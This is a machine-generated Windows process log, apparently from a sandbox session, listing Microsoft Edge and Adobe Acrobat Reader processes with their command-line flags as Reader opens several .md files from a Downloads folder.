"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5624 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6532 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6996 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\MLG.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FBB10F6989A82C622FCCF472A06C3FB0 --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=8F6A3CA4AF03EAF849DD7A013701E9F6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=8F6A3CA4AF03EAF849DD7A013701E9F6 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=33E4D998559D6D8909BA01E5C83BFB50 --mojo-platform-channel-handle=2320 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62FAF29D1A8A7E2A7B64AAF580E3F496 --mojo-platform-channel-handle=1928 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=38C42D02671B42029D0101A00C4D9F08 --mojo-platform-channel-handle=2112 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7028 /prefetch:8
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\BUG32.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\BUG32.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=35E8933D6207A9F3620A6AF677591E43 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=35E8933D6207A9F3620A6AF677591E43 --renderer-client-id=2 --mojo-platform-channel-handle=1668 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6FD7AEBD204C8B14B508717460F44B75 --mojo-platform-channel-handle=1796 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6802F27C812A6E19B228A68CBAFA06F3 --mojo-platform-channel-handle=2396 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EF2C7D4B0439ACFFA169C73D338D879B --mojo-platform-channel-handle=2024 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0573FAC77FCEB1425C4A072E6BEF1354 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7136677044265853502,8798139454498850069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6928 /prefetch:8
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\MrsMajor.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\MrsMajor.md"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=43D57918781C2D37C1E3E9583E15C572 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=90EC6EBBD9A3F49B812BB2E3EF5A4DBA --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=90EC6EBBD9A3F49B812BB2E3EF5A4DBA --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8656B47BF98D81EAC2F95F65D61A2C4E --mojo-platform-channel-handle=2368 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0161D8FECABDFBA3680B77550AA5233A --mojo-platform-channel-handle=2492 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3A79E059FE43BF7066A97B59EF2F5BD5 --mojo-platform-channel-handle=2508 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
